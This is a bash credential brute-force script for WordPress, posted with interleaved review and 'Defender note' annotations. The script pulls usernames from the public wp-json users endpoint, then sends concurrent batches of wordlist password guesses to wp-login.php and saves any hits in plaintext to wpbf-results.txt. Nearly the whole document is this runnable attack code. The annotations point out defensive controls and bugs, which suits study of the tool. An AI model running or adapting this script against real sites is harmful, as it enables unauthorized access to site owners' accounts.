
[BASH] Wordpress Brutefosh 1.0

zerobyte-id Mar 28th, 2019 (edited) 964 Never
  1. #!/bin/bash
  2. # Name       : Wordpress Brutefosh
  3. # Version    : 1.2
  4. # Desc.      : Dictionary Attack Tool - Wordpress Admin
  5. # Coded by   : Schopath
  6. # Website    : www.zerobyte.id
  7. # Updated on : 2019-03-28
  8.  
  9. #----------- CONFIGURATION -----------
  #   curl_timeout is passed as both --connect-timeout and --max-time on every
  #   curl call in this script, so each request is capped at 20 seconds.
  10. curl_timeout=20
  #   multithread_limit is the batch size of background _TestLogin jobs in the
  #   main loop (shell jobs, not threads): the target sees bursts of up to this
  #   many concurrent POSTs to wp-login.php, with no delay between batches.
  11. multithread_limit=10
  12. #--------- CONFIGURATION EOF ---------
  13.  
  #   Remove the username list left by a previous run; further down, the mere
  #   existence of wpusername.tmp decides whether enumeration succeeded.
  #   NOTE(review): the fixed names used in the current working directory
  #   (wpusername.tmp, wplogin.tmp, wpbf-results.txt) are the on-disk artifacts
  #   this script leaves on the host that ran it.
  14. if [[ -f wpusername.tmp ]]
  15. then
  16.     rm wpusername.tmp
  17. fi
  #   ANSI colour escapes, interpreted by the `echo -e` calls below.
  18. RED='\e[31m'
  19. GRN='\e[32m'
  20. YEL='\e[33m'
  21. CLR='\e[0m'
  22.  
  #   _GetUserWPJSON TARGET
  #   Requests TARGET/wp-json/wp/v2/users and pulls every "slug" value out of
  #   the response with a PCRE grep. Each slug is printed and appended to
  #   wpusername.tmp; when nothing matches, only a notice is printed and the
  #   file is not created.
  #   Globals: curl_timeout, YEL, CLR (read); Target, UsernameLists, Username
  #            (written, because nothing is declared local).
  #   Defender note: the function depends entirely on the REST users endpoint
  #   answering an unauthenticated GET. Restricting that endpoint leaves it
  #   with no output (the script then falls back to a manually typed
  #   username), and a GET for this path followed by POSTs to wp-login.php
  #   from the same client is a useful access-log correlation.
  23. function _GetUserWPJSON() {
  24.     Target="${1}";
  25.     UsernameLists=$(curl --connect-timeout ${curl_timeout} --max-time ${curl_timeout} -s "${Target}/wp-json/wp/v2/users" | grep -Po '"slug":"\K.*?(?=")');
  26.     echo ""
  27.     if [[ -z ${UsernameLists} ]];
  28.     then
  29.         echo -e "${YEL}INFO: Cannot detect Username!${CLR}"
  30.     else
  #           echo -n with no arguments writes nothing: this line only
  #           creates (or truncates) wpusername.tmp.
  31.         echo -ne > wpusername.tmp
  #           Unquoted expansion: the grep output is split on whitespace (and
  #           glob-expanded) into individual names.
  32.         for Username in ${UsernameLists};
  33.         do
  34.             echo "INFO: Found username \"${Username}\"..."
  35.             echo "${Username}" >> wpusername.tmp
  36.         done
  37.     fi
  38. }
  39.  
  #   _TestLogin TARGET USERNAME PASSWORD
  #   Sends one form POST (log, pwd, wp-submit) to TARGET/wp-login.php and
  #   classifies the response:
  #     - response contains both "login_error" and "div" -> printed as Invalid
  #     - otherwise, the status field reads 302           -> printed as FOUND and
  #       appended to wpbf-results.txt as "TARGET [USERNAME:PASSWORD]"
  #     - anything else                                    -> printed as Invalid
  #   Globals: curl_timeout, YEL, GRN, CLR (read); Target, Username, Password,
  #            LetsTry (written, because nothing is declared local).
  40. function _TestLogin() {
  41.     Target="${1}"
  42.     Username="${2}"
  43.     Password="${3}"
  #       -w appends a marker line carrying the HTTP status after the body.
  #       The credentials are placed on curl's command line via --data, so
  #       they are visible in the process list of the host running the script.
  #       No -L, -b, -A or -H is passed: redirects are not followed and no
  #       cookies or custom headers are sent with the POST.
  44.     LetsTry=$(curl --connect-timeout ${curl_timeout} --max-time ${curl_timeout} -s -w "\nHTTP_STATUS_CODE_X %{http_code}\n" "${Target}/wp-login.php" --data "log=${Username}&pwd=${Password}&wp-submit=Log+In" --compressed)
  #       Unquoted echo joins the whole response into a single line, so the
  #       two greps match the strings anywhere in the response.
  45.     if [[ ! -z $(echo ${LetsTry} | grep login_error | grep div) ]];
  46.     then
  47.         echo -e "${YEL}INFO: Invalid ${Target} ${Username}:${Password}${CLR}"
  #       On that single joined line awk's $2 is the status code only when
  #       nothing precedes the marker, i.e. the response body is empty.
  #       NOTE(review): a 302 is taken as success without inspecting the
  #       Location header, so entries in wpbf-results.txt are unverified.
  48.     elif [[ $(echo ${LetsTry} | grep "HTTP_STATUS_CODE_X" | awk '{print $2}') == "302" ]];
  49.     then
  50.         echo -e "${GRN}[!] FOUND ${Target} \e[30;48;5;82m ${Username}:${Password} ${CLR}"
  #           Plaintext credential record; the file is only ever appended to.
  51.         echo "${Target} [${Username}:${Password}]" >> wpbf-results.txt
  52.     else
  53.         echo -e "${YEL}INFO: Invalid ${Target} ${Username}:${Password}${CLR}"
  54.     fi
  55. }
  56.  
  #   Start-up: print the banner, then interactively collect the target URL
  #   and the wordlist path, aborting if either fails its check.
  57. echo ' _    _               _                         '
  58. echo '| |  | | ___  _ __ __| |_ __  _ __ ___  ___ ___ '
  59. echo '| |/\| |/ _ \| `__/ _` | `_ \| `__/ _ \/ __/ __|'
  60. echo '\  /\  / (_) | | | (_| | |_) | | |  __/\__ \__ \'
  61. echo ' \/  \/ \___/|_|  \__,_| .__/|_|  \___||___/___/'
  62. echo '                       |_|.::Brutefo(sh) 2019::.'
  63. echo ''
  64.  
  #   The value read here is used verbatim as the URL prefix for every
  #   request; it is not validated or normalised (read is used without -r).
  65. echo -ne "[?] Input website target : "
  66. read Target
  67.  
  #   Probe: fetch Target/wp-login.php into wplogin.tmp and require the string
  #   "wp-submit" in it. wplogin.tmp is not removed anywhere in this listing.
  #   Defender note: this plain GET of wp-login.php is the first request the
  #   target receives; the users-endpoint GET and the POST bursts follow it.
  68. curl --connect-timeout ${curl_timeout} --max-time ${curl_timeout} -s "${Target}/wp-login.php" > wplogin.tmp
  69. if [[ -z $(cat wplogin.tmp | grep "wp-submit") ]];
  70. then
  71.     echo -e "${RED}ERROR: Invalid wordpress wp-login!${CLR}"
  #       Bare exit: the exit status is that of the preceding echo.
  72.     exit
  73. fi
  74.  
  #   Path of the candidate-password file; it must be an existing regular file.
  75. echo -ne "[?] Input password lists in (file) : "
  76. read PasswordLists
  77.  
  78. if [[ ! -f ${PasswordLists} ]]
  79. then
  80.     echo -e "${RED}ERROR: Wordlists not found!${CLR}"
  81.     exit
  82. fi
  83.  
  #   Main flow: enumerate usernames, then call _TestLogin for every
  #   (username, candidate) pair, in background batches of multithread_limit.
  #   Defender note: the request volume is usernames x wordlist entries, with
  #   no pause other than waiting for a batch to finish. Per-account and
  #   per-IP login throttling, lockout and a second factor are the controls
  #   that bound what this loop can achieve.
  84. _GetUserWPJSON ${Target}
  85.  
  #   wpusername.tmp exists only if _GetUserWPJSON found at least one slug.
  86. if [[ -f wpusername.tmp ]]
  87. then
  88.     for User in $(cat wpusername.tmp)
  89.     do
  #           One subshell per user: cthread is modified inside it, so the
  #           counter starts unset again for the next user.
  90.         (
  #               $(cat ...) is unquoted, so the file is split on any
  #               whitespace and glob-expanded, not read line by line.
  91.             for Pass in $(cat ${PasswordLists})
  92.             do
  #                   Batching: cthread counts jobs modulo multithread_limit;
  #                   each time it wraps to 0 the loop waits for all
  #                   outstanding background jobs before starting more.
  93.                 ((cthread=cthread%multithread_limit)); ((cthread++==0)) && wait
  94.                 _TestLogin ${Target} ${User} ${Pass} &
  95.             done
  #               Drain the last, possibly partial, batch.
  96.             wait
  97.         )
  98.     done
  99. else
  #       Fallback when enumeration returned nothing: ask for one username.
  100.     echo -e "${YEL}INFO: Cannot find username${CLR}"
  101.     echo -ne "[?] Input username manually : "
  102.     read User
  103.  
  #       NOTE(review): the message is about the username, but the test is on
  #       PasswordLists, which already passed the -f check earlier in the
  #       script; this branch therefore cannot fire and an empty User is
  #       not rejected.
  104.     if [[ -z ${PasswordLists} ]]
  105.     then
  106.         echo -e "${RED}ERROR: Username cannot be empty!${CLR}"
  107.         exit
  108.     fi
  109.     echo ''
  #       Same batching loop as above, for the single typed username.
  110.     (
  111.         for Pass in $(cat ${PasswordLists})
  112.         do
  113.             ((cthread=cthread%multithread_limit)); ((cthread++==0)) && wait
  114.             _TestLogin ${Target} ${User} ${Pass} &
  115.         done
  116.         wait
  117.     )
  118. fi
  #   Summary: counts the distinct lines of wpbf-results.txt that match Target
  #   (passed unquoted to grep, so it is treated as a pattern). The file is
  #   append-only, so matches recorded by earlier runs are counted too. If no
  #   run has ever recorded a hit the file does not exist, cat reports an
  #   error and the count printed is 0.
  119. echo "INFO: Found $(cat wpbf-results.txt | grep ${Target} | sort -nr | uniq | wc -l) username & password in ./wpbf-results.txt"